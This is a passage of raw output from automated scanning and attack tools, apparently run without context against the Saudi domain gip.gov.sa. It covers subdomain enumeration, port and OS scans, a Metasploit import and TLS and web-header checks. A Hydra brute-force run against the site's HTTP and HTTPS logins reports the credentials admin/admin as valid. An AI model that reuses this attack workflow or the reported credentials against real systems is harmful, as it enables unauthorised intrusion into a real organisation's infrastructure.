  1793. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1794. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1795. /_/ discover v0.5.0 - by @michenriksen
  1796.  
  1797. Identifying nameservers for gip.gov.sa... Done
  1798. Using nameservers:
  1799.  
  1800. - 212.138.117.73
  1801. - 212.138.117.74
  1802.  
  1803. Checking for wildcard DNS... Done
  1804.  
  1805. Running collector: Certificate Search... Done (7 hosts)
  1806. Running collector: Netcraft... Done (0 hosts)
  1807. Running collector: Shodan... Skipped
  1808. -> Key 'shodan' has not been set
  1809. Running collector: Censys... Skipped
  1810. -> Key 'censys_secret' has not been set
  1811. Running collector: DNSDB... Error
  1812. -> DNSDB returned unexpected response code: 503
  1813. Running collector: Wayback Machine... Done (3 hosts)
  1814. Running collector: Threat Crowd... Done (1 host)
  1815. Running collector: Dictionary... Done (27 hosts)
  1816. Running collector: Google Transparency Report... Done (3 hosts)
  1817. Running collector: PTRArchive... Error
  1818. -> PTRArchive returned unexpected response code: 502
  1819. Running collector: PassiveTotal... Skipped
  1820. -> Key 'passivetotal_key' has not been set
  1821. Running collector: VirusTotal... Skipped
  1822. -> Key 'virustotal' has not been set
  1823. Running collector: HackerTarget... Done (4 hosts)
  1824. Running collector: PublicWWW... Done (0 hosts)
  1825. Running collector: Riddler... Skipped
  1826. -> Key 'riddler_username' has not been set
  1827.  
  1828. Resolving 36 unique hosts...
  1829. 212.138.117.71 .gip.gov.sa
  1830. 212.138.117.71 gip.gov.sa
  1831. 212.138.117.191 mx1.gip.gov.sa
  1832. 212.138.117.192 mx2.gip.gov.sa
  1833. 212.138.117.190 webmail.gip.gov.sa
  1834. 212.138.117.71 www.gip.gov.sa
  1835.  
  1836. Found subnets:
  1837.  
  1838. - 212.138.117.0-255 : 6 hosts
  1839.  
  1840. Wrote 6 hosts to:
  1841.  
  1842. - file:///root/aquatone/gip.gov.sa/hosts.txt
  1843. - file:///root/aquatone/gip.gov.sa/hosts.json
  1844. __
  1845. ____ _____ ___ ______ _/ /_____ ____ ___
  1846. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  1847. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1848. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1849. /_/ takeover v0.5.0 - by @michenriksen
  1850.  
  1851. Loaded 6 hosts from /root/aquatone/gip.gov.sa/hosts.json
  1852. Loaded 25 domain takeover detectors
  1853.  
  1854. Identifying nameservers for gip.gov.sa... Done
  1855. Using nameservers:
  1856.  
  1857. - 212.138.117.74
  1858. - 212.138.117.73
  1859.  
  1860. Checking hosts for domain takeover vulnerabilities...
  1861.  
  1862. Finished checking hosts:
  1863.  
  1864. - Vulnerable : 0
  1865. - Not Vulnerable : 6
  1866.  
  1867. Wrote 0 potential subdomain takeovers to:
  1868.  
  1869. - file:///root/aquatone/gip.gov.sa/takeovers.json
  1870.  
  1871. __
  1872. ____ _____ ___ ______ _/ /_____ ____ ___
  1873. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  1874. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1875. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1876. /_/ scan v0.5.0 - by @michenriksen
  1877.  
  1878. Loaded 6 hosts from /root/aquatone/gip.gov.sa/hosts.json
  1879.  
  1880. Probing 8 ports...
  1881.  
  1882. Wrote open ports to file:///root/aquatone/gip.gov.sa/open_ports.txt
  1883. Wrote URLs to file:///root/aquatone/gip.gov.sa/urls.txt
  1884. __
  1885. ____ _____ ___ ______ _/ /_____ ____ ___
  1886. / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  1887. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
  1888. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  1889. /_/ gather v0.5.0 - by @michenriksen
  1890.  
  1891. Processing 0 pages...
  1892.  
  1893. Finished processing pages:
  1894.  
  1895. - Successful : 0
  1896. - Failed : 0
  1897.  
  1898. Generating report...done
  1899. Report pages generated:
  1900. #######################################################################################################################################
  1901. No emails found
  1902. 
  1903. [+] Hosts found in search engines:
  1904. ------------------------------------
  1905.  
  1906. Total hosts: 15
  1907.  
  1908. [-] Resolving hostnames IPs...
  1909.  
  1910. .gip.gov.sa:empty
  1911. 2Fwww.gip.gov.sa:empty
  1912. autodiscover.gip.gov.sa:empty
  1913. gip-mail.gip.gov.sa:empty
  1914. jobs.gip.gov.sa:empty
  1915. mail.gip.gov.sa:empty
  1916. webmail.gip.gov.sa:212.138.117.190
  1917. www.gip.gov.sa:212.138.117.71
  1918. #######################################################################################################################################
  1919. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:52 EDT
  1920. Nmap scan report for gip.gov.sa (212.138.117.71)
  1921. Host is up.
  1922.  
  1923. PORT STATE SERVICE
  1924. 53/udp open|filtered domain
  1925. 67/udp open|filtered dhcps
  1926. 68/udp open|filtered dhcpc
  1927. 69/udp open|filtered tftp
  1928. 88/udp open|filtered kerberos-sec
  1929. 123/udp open|filtered ntp
  1930. 137/udp open|filtered netbios-ns
  1931. 138/udp open|filtered netbios-dgm
  1932. 139/udp open|filtered netbios-ssn
  1933. 161/udp open|filtered snmp
  1934. 162/udp open|filtered snmptrap
  1935. 389/udp open|filtered ldap
  1936. 520/udp open|filtered route
  1937. 2049/udp open|filtered nfs
  1938. #######################################################################################################################################
  1939. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:52 EDT
  1940. Nmap scan report for gip.gov.sa (212.138.117.71)
  1941. Host is up.
  1942.  
  1943. PORT STATE SERVICE VERSION
  1944. 67/udp open|filtered dhcps
  1945. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
  1946. Too many fingerprints match this host to give specific OS details
  1947.  
  1948. TRACEROUTE (using proto 1/icmp)
  1949. HOP RTT ADDRESS
  1950. 1 ... 30
  1951.  
  1952. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1953. Nmap done: 1 IP address (1 host up) scanned in 111.47 seconds
  1954. + -- --=[Port 68 opened... running tests...
  1955. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:54 EDT
  1956. Nmap scan report for gip.gov.sa (212.138.117.71)
  1957. Host is up.
  1958.  
  1959. PORT STATE SERVICE VERSION
  1960. 68/udp open|filtered dhcpc
  1961. Too many fingerprints match this host to give specific OS details
  1962.  
  1963. TRACEROUTE (using proto 1/icmp)
  1964. HOP RTT ADDRESS
  1965. 1 ... 30
  1966.  
  1967. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1968. Nmap done: 1 IP address (1 host up) scanned in 111.31 seconds
  1969. + -- --=[Port 69 opened... running tests...
  1970. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:56 EDT
  1971. + -- --=[Port 79 closed... skipping.
  1972. + -- --=[Port 80 closed... skipping.
  1973. + -- --=[Port 110 closed... skipping.
  1974. + -- --=[Port 111 closed... skipping.
  1975. + -- --=[Port 123 opened... running tests...
  1976. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:56 EDT
  1977. + -- --=[Port 135 closed... skipping.
  1978. + -- --=[Port 137 closed... skipping.
  1979. + -- --=[Port 139 closed... skipping.
  1980. + -- --=[Port 161 opened... running tests...
  1981. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 14:56 EDT
  1982. Nmap scan report for gip.gov.sa (212.138.117.71)
  1983. Host is up (1.5s latency).
  1984.  
  1985. PORT STATE SERVICE VERSION
  1986. 161/tcp filtered snmp
  1987. 161/udp open|filtered snmp
  1988. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1989. Device type: general purpose
  1990. Running: Microsoft Windows XP
  1991. OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
  1992. OS details: Microsoft Windows XP SP2 or SP3
  1993.  
  1994. TRACEROUTE (using proto 1/icmp)
  1995. HOP RTT ADDRESS
  1996. 1 ... 30
  1997.  
  1998. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1999. Nmap done: 1 IP address (1 host up) scanned in 239.74 seconds
  2000.  
  2001. .,,. .
  2002. .\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
  2003. d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
  2004. d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
  2005. d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
  2006. 88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
  2007. d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
  2008. d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
  2009. .a#$$$$$$"` 88b d8P 88b`?8888P'
  2010. ,s$$$$$$$"` 888888P' 88n _.,,,ass;:
  2011. .a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
  2012. .a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
  2013. ,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
  2014. .a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
  2015. _______________________________________________________________ ,&$$$$$$'_____
  2016. ll&&$$$$'
  2017. .;;lll&&&&'
  2018. ...;;lllll&'
  2019. ......;;;llll;;;....
  2020. ` ......;;;;... . .
  2021.  
  2022.  
  2023. =[ metasploit v4.17.18-dev ]
  2024. + -- --=[ 1818 exploits - 1031 auxiliary - 315 post ]
  2025. + -- --=[ 539 payloads - 42 encoders - 10 nops ]
  2026. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2027.  
  2028. ######################################################################################################################################
  2029.  
  2030. I, [2018-10-21T15:00:27.432732 #20446] INFO -- : Initiating port scan
  2031. I, [2018-10-21T15:07:14.844257 #20446] INFO -- : Using nmap scan output file logs/nmap_output_2018-10-21_15-00-27.xml
  2032. I, [2018-10-21T15:07:14.863147 #20446] INFO -- : Discovered open port: 212.138.117.71:80
  2033. I, [2018-10-21T15:07:20.758639 #20446] INFO -- : Discovered open port: 212.138.117.71:443
  2034. I, [2018-10-21T15:07:34.553666 #20446] INFO -- : <<<Enumerating vulnerable applications>>>
  2035.  
  2036.  
  2037. --------------------------------------------------------
  2038. <<<Yasuo discovered following vulnerable applications>>>
  2039. --------------------------------------------------------
  2040. +----------+--------------------+-------------------+----------+----------+
  2041. | App Name | URL to Application | Potential Exploit | Username | Password |
  2042. +----------+--------------------+-------------------+----------+----------+
  2043. +----------+--------------------+-------------------+----------+----------+
  2044. #######################################################################################################################################
  2045. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 15:36 EDT
  2046. NSE: Loaded 129 scripts for scanning.
  2047. NSE: Script Pre-scanning.
  2048. Initiating NSE at 15:36
  2049. Completed NSE at 15:36, 10.42s elapsed
  2050. Initiating NSE at 15:36
  2051. Completed NSE at 15:36, 0.06s elapsed
  2052. Pre-scan script results:
  2053. | broadcast-igmp-discovery:
  2054. | 192.168.0.1
  2055. | Interface: eth0
  2056. | Version: 2
  2057. | Group: 224.0.0.2
  2058. | Description: All Routers on this Subnet
  2059. | 192.168.0.1
  2060. | Interface: eth0
  2061. | Version: 2
  2062. | Group: 224.0.0.22
  2063. | Description: IGMP
  2064. | 192.168.0.3
  2065. | Interface: eth0
  2066. | Version: 2
  2067. | Group: 224.0.0.251
  2068. | Description: mDNS (rfc6762)
  2069. | 192.168.0.3
  2070. | Interface: eth0
  2071. | Version: 2
  2072. | Group: 224.0.0.252
  2073. | Description: Link-local Multicast Name Resolution (rfc4795)
  2074. | 192.168.0.3
  2075. | Interface: eth0
  2076. | Version: 2
  2077. | Group: 239.192.152.143
  2078. | Description: Organization-Local Scope (rfc2365)
  2079. | 192.168.0.2
  2080. | Interface: eth0
  2081. | Version: 2
  2082. | Group: 239.255.255.246
  2083. | Description: Organization-Local Scope (rfc2365)
  2084. | 192.168.0.3
  2085. | Interface: eth0
  2086. | Version: 2
  2087. | Group: 239.255.255.250
  2088. | Description: Organization-Local Scope (rfc2365)
  2089. |_ Use the newtargets script-arg to add the results as targets
  2090. |_broadcast-pim-discovery: ERROR: Script execution failed (use -d to debug)
  2091. | broadcast-ping:
  2092. | IP: 192.168.0.1 MAC: 38:70:0c:d7:c1:0a
  2093. |_ Use --script-args=newtargets to add the results as targets
  2094. Initiating Ping Scan at 15:36
  2095. Scanning gip.gov.sa (212.138.117.71) [7 ports]
  2096. Completed Ping Scan at 15:36, 2.04s elapsed (1 total hosts)
  2097. Nmap scan report for gip.gov.sa (212.138.117.71) [host down]
  2098. NSE: Script Post-scanning.
  2099. Initiating NSE at 15:36
  2100. Completed NSE at 15:36, 0.00s elapsed
  2101. Initiating NSE at 15:36
  2102. Completed NSE at 15:36, 0.00s elapsed
  2103. Read data files from: /usr/bin/../share/nmap
  2104. Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
  2105. Nmap done: 1 IP address (0 hosts up) scanned in 13.16 seconds
  2106. Raw packets sent: 14 (552B) | Rcvd: 51 (3.156KB)
  2107. #######################################################################################################################################
  2108. Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-21 15:36 EDT
  2109. Nmap scan report for gip.gov.sa (212.138.117.71)
  2110. Host is up (1.8s latency).
  2111. Not shown: 20 closed ports, 4 filtered ports
  2112. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  2113. PORT STATE SERVICE
  2114. 80/tcp open http
  2115. 443/tcp open https
  2116. #######################################################################################################################################
  2117. + -- --=[Port 21 closed... skipping.
  2118. + -- --=[Port 22 closed... skipping.
  2119. + -- --=[Port 23 closed... skipping.
  2120. + -- --=[Port 25 closed... skipping.
  2121. + -- --=[Port 80 opened... running tests...
  2122. Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2123.  
  2124. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2018-10-21 15:36:46
  2125. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2126. [DATA] attacking http-get://gip.gov.sa:80/
  2127. [80][http-get] host: gip.gov.sa login: admin password: admin
  2128. [STATUS] attack finished for gip.gov.sa (valid pair found)
  2129. 1 of 1 target successfully completed, 1 valid password found
  2130. Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2018-10-21 15:36:49
  2131. + -- --=[Port 110 closed... skipping.
  2132. + -- --=[Port 139 closed... skipping.
  2133. + -- --=[Port 162 closed... skipping.
  2134. + -- --=[Port 389 closed... skipping.
  2135. + -- --=[Port 443 opened... running tests...
  2136. Hydra v8.7-dev (c) 2018 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2137.  
  2138. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2018-10-21 15:36:49
  2139. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
  2140. [DATA] attacking http-gets://gip.gov.sa:443/
  2141. [443][http-get] host: gip.gov.sa login: admin password: admin
  2142. [STATUS] attack finished for gip.gov.sa (valid pair found)
  2143. 1 of 1 target successfully completed, 1 valid password found
  2144. Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2018-10-21 15:37:02
  2145. + -- --=[Port 445 closed... skipping.
  2146. + -- --=[Port 512 closed... skipping.
  2147. + -- --=[Port 513 closed... skipping.
  2148. + -- --=[Port 514 closed... skipping.
  2149. + -- --=[Port 993 closed... skipping.
  2150. + -- --=[Port 1433 closed... skipping.
  2151. + -- --=[Port 1521 closed... skipping.
  2152. + -- --=[Port 3306 closed... skipping.
  2153. + -- --=[Port 3389 closed... skipping.
  2154. + -- --=[Port 5432 closed... skipping.
  2155. + -- --=[Port 5900 closed... skipping.
  2156. + -- --=[Port 5901 closed... skipping.
  2157. + -- --=[Port 8000 closed... skipping.
  2158. + -- --=[Port 8080 closed... skipping.
  2159. + -- --=[Port 8100 closed... skipping.
  2160. + -- --=[Port 6667 closed... skipping.
  2161. #######################################################################################################################################
  2162. [*] Importing 'Nmap XML' data
  2163. [*] Import: Parsing with 'Nokogiri v1.8.5'
  2164. [*] Importing host 212.138.117.71
  2165. [*] Successfully imported /usr/share/sniper/loot/gip.gov.sa/nmap/nmap-udp-gip.gov.sa.xml
  2166. [*] Importing 'Nmap XML' data
  2167. [*] Import: Parsing with 'Nokogiri v1.8.5'
  2168. [*] Successfully imported /usr/share/sniper/loot/gip.gov.sa/nmap/nmap-gip.gov.sa.xml
  2169.  
  2170. Hosts
  2171. =====
  2172.  
  2173. address mac name os_name os_flavor os_sp purpose info comments
  2174. ------- --- ---- ------- --------- ----- ------- ---- --------
  2175. 62.90.225.20 Unknown device
  2176. 91.121.133.224 irc.nullsecurity.net embedded device
  2177. 107.152.98.18 tss.centralprocessingunit.com Unknown device
  2178. 107.154.130.27 107.154.130.27 Unknown device
  2179. 107.154.248.27 107.154.248.27 Unknown device
  2180. 185.230.61.161 Unknown device
  2181. 198.144.120.68 Unknown device
  2182. 212.28.242.131 Unknown device
  2183. 212.138.117.71 Unknown device
  2184.  
  2185. Services
  2186. ========
  2187.  
  2188. host port proto name state info
  2189. ---- ---- ----- ---- ----- ----
  2190. 62.90.225.20 21 tcp ftp open 220 Microsoft FTP Service\x0d\x0a
  2191. 91.121.133.224 21 tcp tcpwrapped open
  2192. 91.121.133.224 25 tcp smtp filtered
  2193. 91.121.133.224 53 udp domain unknown
  2194. 91.121.133.224 67 udp dhcps unknown
  2195. 91.121.133.224 68 udp dhcpc unknown
  2196. 91.121.133.224 69 udp tftp unknown
  2197. 91.121.133.224 80 tcp http open blackarch/1.33.7
  2198. 91.121.133.224 88 udp kerberos-sec unknown
  2199. 91.121.133.224 119 tcp nntp filtered
  2200. 91.121.133.224 123 udp ntp unknown
  2201. 91.121.133.224 135 tcp msrpc filtered
  2202. 91.121.133.224 137 udp netbios-ns unknown
  2203. 91.121.133.224 138 udp netbios-dgm unknown
  2204. 91.121.133.224 139 tcp netbios-ssn filtered
  2205. 91.121.133.224 139 udp netbios-ssn unknown
  2206. 91.121.133.224 161 udp snmp unknown
  2207. 91.121.133.224 162 udp snmptrap unknown
  2208. 91.121.133.224 389 udp ldap unknown
  2209. 91.121.133.224 443 tcp ssl/https open blackarch/1.33.7
  2210. 91.121.133.224 445 tcp microsoft-ds filtered
  2211. 91.121.133.224 520 udp route unknown
  2212. 91.121.133.224 554 tcp tcpwrapped open
  2213. 91.121.133.224 873 tcp rsync open protocol version 31
  2214. 91.121.133.224 880 tcp unknown filtered
  2215. 91.121.133.224 2022 tcp ssh open protocol 2.0
  2216. 91.121.133.224 2049 udp nfs unknown
  2217. 91.121.133.224 7070 tcp tcpwrapped open
  2218. 107.152.98.18 21 tcp ftp open 220 ProFTPD 1.3.5b Server (ProFTPD) [107.152.98.18]\x0d\x0a
  2219. 107.152.98.18 53 udp domain unknown
  2220. 107.152.98.18 67 udp dhcps unknown
  2221. 107.152.98.18 68 udp dhcpc unknown
  2222. 107.152.98.18 69 udp tftp unknown
  2223. 107.152.98.18 88 udp kerberos-sec unknown
  2224. 107.152.98.18 123 udp ntp unknown
  2225. 107.152.98.18 137 udp netbios-ns unknown
  2226. 107.152.98.18 138 udp netbios-dgm unknown
  2227. 107.152.98.18 139 udp netbios-ssn unknown
  2228. 107.152.98.18 161 udp snmp unknown
  2229. 107.152.98.18 162 udp snmptrap unknown
  2230. 107.152.98.18 389 udp ldap unknown
  2231. 107.152.98.18 520 udp route unknown
  2232. 107.152.98.18 2049 udp nfs unknown
  2233. 107.154.130.27 80 tcp http open ( 503-Service Unavailable )
  2234. 107.154.130.27 8080 tcp http open ( 503-Service Unavailable )
  2235. 107.154.248.27 8080 tcp http open ( 503-Service Unavailable )
  2236. 185.230.61.161 53 udp domain unknown
  2237. 185.230.61.161 67 udp dhcps unknown
  2238. 185.230.61.161 68 udp dhcpc unknown
  2239. 185.230.61.161 69 udp tftp unknown
  2240. 185.230.61.161 88 udp kerberos-sec unknown
  2241. 185.230.61.161 123 udp ntp unknown
  2242. 185.230.61.161 137 udp netbios-ns unknown
  2243. 185.230.61.161 138 udp netbios-dgm unknown
  2244. 185.230.61.161 139 udp netbios-ssn unknown
  2245. 185.230.61.161 161 udp snmp unknown
  2246. 185.230.61.161 162 udp snmptrap unknown
  2247. 185.230.61.161 389 udp ldap unknown
  2248. 185.230.61.161 520 udp route unknown
  2249. 185.230.61.161 2049 udp nfs unknown
  2250. 198.144.120.68 53 udp domain open
  2251. 198.144.120.68 67 udp dhcps unknown
  2252. 198.144.120.68 68 udp dhcpc unknown
  2253. 198.144.120.68 69 udp tftp unknown
  2254. 198.144.120.68 88 udp kerberos-sec unknown
  2255. 198.144.120.68 123 udp ntp unknown
  2256. 198.144.120.68 137 udp netbios-ns unknown
  2257. 198.144.120.68 138 udp netbios-dgm unknown
  2258. 198.144.120.68 139 udp netbios-ssn unknown
  2259. 198.144.120.68 161 udp snmp unknown
  2260. 198.144.120.68 162 udp snmptrap unknown
  2261. 198.144.120.68 389 udp ldap unknown
  2262. 198.144.120.68 520 udp route unknown
  2263. 198.144.120.68 2049 udp nfs unknown
  2264. 212.28.242.131 22 tcp ssh open SSH-2.0-OpenSSH_5.3
  2265. 212.138.117.71 53 udp domain unknown
  2266. 212.138.117.71 67 udp dhcps unknown
  2267. 212.138.117.71 68 udp dhcpc unknown
  2268. 212.138.117.71 69 udp tftp unknown
  2269. 212.138.117.71 88 udp kerberos-sec unknown
  2270. 212.138.117.71 123 udp ntp unknown
  2271. 212.138.117.71 137 udp netbios-ns unknown
  2272. 212.138.117.71 138 udp netbios-dgm unknown
  2273. 212.138.117.71 139 udp netbios-ssn unknown
  2274. 212.138.117.71 161 udp snmp unknown
  2275. 212.138.117.71 162 udp snmptrap unknown
  2276. 212.138.117.71 389 udp ldap unknown
  2277. 212.138.117.71 520 udp route unknown
  2278. 212.138.117.71 2049 udp nfs unknown
  2279. #######################################################################################################################################
  2280. AVAILABLE PLUGINS
  2281. -----------------
  2282.  
  2283. PluginSessionRenegotiation
  2284. PluginOpenSSLCipherSuites
  2285. PluginChromeSha1Deprecation
  2286. PluginCertInfo
  2287. PluginHSTS
  2288. PluginCompression
  2289. PluginSessionResumption
  2290. PluginHeartbleed
  2291.  
  2292.  
  2293.  
  2294. CHECKING HOST(S) AVAILABILITY
  2295. -----------------------------
  2296.  
  2297. 212.138.117.71:443 => 212.138.117.71:443
  2298.  
  2299.  
  2300.  
  2301. SCAN RESULTS FOR 212.138.117.71:443 - 212.138.117.71:443
  2302. --------------------------------------------------------
  2303.  
  2304. * Deflate Compression:
  2305. OK - Compression disabled
  2306.  
  2307. * Session Renegotiation:
  2308. Client-initiated Renegotiations: OK - Rejected
  2309. Secure Renegotiation: OK - Supported
  2310.  
  2311. * Certificate - Content:
  2312. SHA1 Fingerprint: dcd6270e4668c89fec9f8e82212452cbdee3b19b
  2313. Common Name: *.gip.gov.sa
  2314. Issuer: DigiCert SHA2 Secure Server CA
  2315. Serial Number: 0EA1625D8313654FFC438CCB917ECB83
  2316. Not Before: Aug 30 00:00:00 2018 GMT
  2317. Not After: Oct 11 12:00:00 2019 GMT
  2318. Signature Algorithm: sha256WithRSAEncryption
  2319. Public Key Algorithm: rsaEncryption
  2320. Key Size: 2048 bit
  2321. Exponent: 65537 (0x10001)
  2322. X509v3 Subject Alternative Name: {'DNS': ['*.gip.gov.sa', 'gip.gov.sa']}
  2323.  
  2324. * Certificate - Trust:
  2325. Hostname Validation: FAILED - Certificate does NOT match 212.138.117.71
  2326. Google CA Store (09/2015): OK - Certificate is trusted
  2327. Java 6 CA Store (Update 65): OK - Certificate is trusted
  2328. Microsoft CA Store (09/2015): OK - Certificate is trusted
  2329. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  2330. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  2331. Certificate Chain Received: ['*.gip.gov.sa', 'DigiCert SHA2 Secure Server CA']
  2332.  
  2333. * Certificate - OCSP Stapling:
  2334. OCSP Response Status: successful
  2335. Validation w/ Mozilla's CA Store: OK - Response is trusted
  2336. Responder Id: 0F80611C823161D52F28E78D4638B42CE1C6D9E2
  2337. Cert Status: good
  2338. Cert Serial Number: 0EA1625D8313654FFC438CCB917ECB83
  2339. This Update: Oct 15 21:42:13 2018 GMT
  2340. Next Update: Oct 22 20:57:13 2018 GMT
  2341.  
  2342. Unhandled exception when processing --heartbleed:
  2343. utils.SSLyzeSSLConnection.SSLHandshakeRejected - TCP / Received RST
  2344.  
  2345. * Session Resumption:
  2346. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  2347. With TLS Session Tickets: NOT SUPPORTED - TLS ticket not assigned.
  2348.  
  2349. * TLSV1_2 Cipher Suites:
  2350. Preferred:
  2351. ECDHE-RSA-AES256-SHA384 ECDH-521 bits 256 bits HTTP 200 OK
  2352. Accepted:
  2353. ECDHE-RSA-AES256-SHA384 ECDH-521 bits 256 bits HTTP 200 OK
  2354. ECDHE-RSA-AES256-SHA ECDH-521 bits 256 bits HTTP 200 OK
  2355. AES256-SHA256 - 256 bits HTTP 200 OK
  2356. AES256-SHA - 256 bits HTTP 200 OK
  2357. AES256-GCM-SHA384 - 256 bits HTTP 200 OK
  2358. ECDHE-RSA-AES128-SHA256 ECDH-521 bits 128 bits HTTP 200 OK
  2359. ECDHE-RSA-AES128-SHA ECDH-521 bits 128 bits HTTP 200 OK
  2360. AES128-SHA256 - 128 bits HTTP 200 OK
  2361. AES128-SHA - 128 bits HTTP 200 OK
  2362. AES128-GCM-SHA256 - 128 bits HTTP 200 OK
  2363. Undefined - An unexpected error happened:
  2364. DHE-RSA-AES128-GCM-SHA256 timeout - timed out
  2365.  
  2366. * SSLV2 Cipher Suites:
  2367. Undefined - An unexpected error happened:
  2368. DES-CBC-MD5 timeout - timed out
  2369.  
  2370. * TLSV1_1 Cipher Suites:
  2371. Preferred:
  2372. ECDHE-RSA-AES256-SHA ECDH-521 bits 256 bits HTTP 200 OK
  2373. Accepted:
  2374. AES128-SHA - 128 bits HTTP 200 OK
  2375. Undefined - An unexpected error happened:
  2376. SEED-SHA timeout - timed out
  2377. DHE-RSA-SEED-SHA timeout - timed out
  2378. DHE-RSA-CAMELLIA128-SHA timeout - timed out
  2379. DHE-RSA-AES128-SHA timeout - timed out
  2380. DHE-DSS-SEED-SHA timeout - timed out
  2381. DHE-DSS-CAMELLIA128-SHA timeout - timed out
  2382. DHE-DSS-AES128-SHA timeout - timed out
  2383. DH-RSA-SEED-SHA timeout - timed out
  2384. DH-RSA-CAMELLIA128-SHA timeout - timed out
  2385. DH-DSS-SEED-SHA timeout - timed out
  2386. DH-DSS-CAMELLIA128-SHA timeout - timed out
  2387. DH-DSS-AES128-SHA timeout - timed out
  2388. AECDH-AES128-SHA timeout - timed out
  2389. ADH-SEED-SHA timeout - timed out
  2390. ADH-CAMELLIA128-SHA timeout - timed out
  2391. ADH-AES128-SHA timeout - timed out
  2392. ECDHE-RSA-AES256-SHA error - [Errno 104] Connection reset by peer
  2393.  
  2394. * SSLV3 Cipher Suites:
  2395. Undefined - An unexpected error happened:
  2396. DHE-RSA-CAMELLIA128-SHA timeout - timed out
  2397. DHE-DSS-SEED-SHA timeout - timed out
  2398. DHE-DSS-AES128-SHA timeout - timed out
  2399. DH-DSS-SEED-SHA timeout - timed out
  2400. DH-DSS-AES128-SHA timeout - timed out
  2401. AECDH-AES128-SHA timeout - timed out
  2402.  
  2403. * TLSV1 Cipher Suites:
  2404. Undefined - An unexpected error happened:
  2405. DHE-RSA-CAMELLIA256-SHA timeout - timed out
  2406. DHE-RSA-AES256-SHA timeout - timed out
  2407. DHE-DSS-CAMELLIA256-SHA timeout - timed out
  2408. DH-DSS-CAMELLIA256-SHA timeout - timed out
  2409.  
  2410.  
  2411.  
  2412. SCAN COMPLETED IN 197.40 S
  2413. --------------------------------------------------------------------------------------------------------------------------------------
  2414. #######################################################################################################################################
  2415. ---------------------------------------------------------------------------------------------------------------------------------------
  2416. + Target IP: 212.138.117.71
  2417. + Target Hostname: gip.gov.sa
  2418. + Target Port: 443
  2419. ---------------------------------------------------------------------------------------------------------------------------------------
  2420. + SSL Info: Subject: /C=SA/L=Riyadh/O=General Intelligence Presidency/CN=*.gip.gov.sa
  2421. Ciphers: ECDHE-RSA-AES256-SHA384
  2422. Issuer: /C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
  2423. + Start Time: 2018-10-21 14:19:09 (GMT-4)
  2424. ---------------------------------------------------------------------------------------------------------------------------------------
  2425. + Server: Microsoft-IIS/8.5
  2426. + Retrieved x-aspnet-version header: 4.0.30319
  2427. + Retrieved x-powered-by header: ASP.NET
  2428. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2429. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  2430. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2431. + Cookie __RequestVerificationToken created without the secure flag
  2432. + ERROR: Error limit (20) reached for host, giving up. Last error:
  2433. + ERROR: Error limit (20) reached for host, giving up. Last error:
  2434. + Scan terminated: 0 error(s) and 6 item(s) reported on remote host
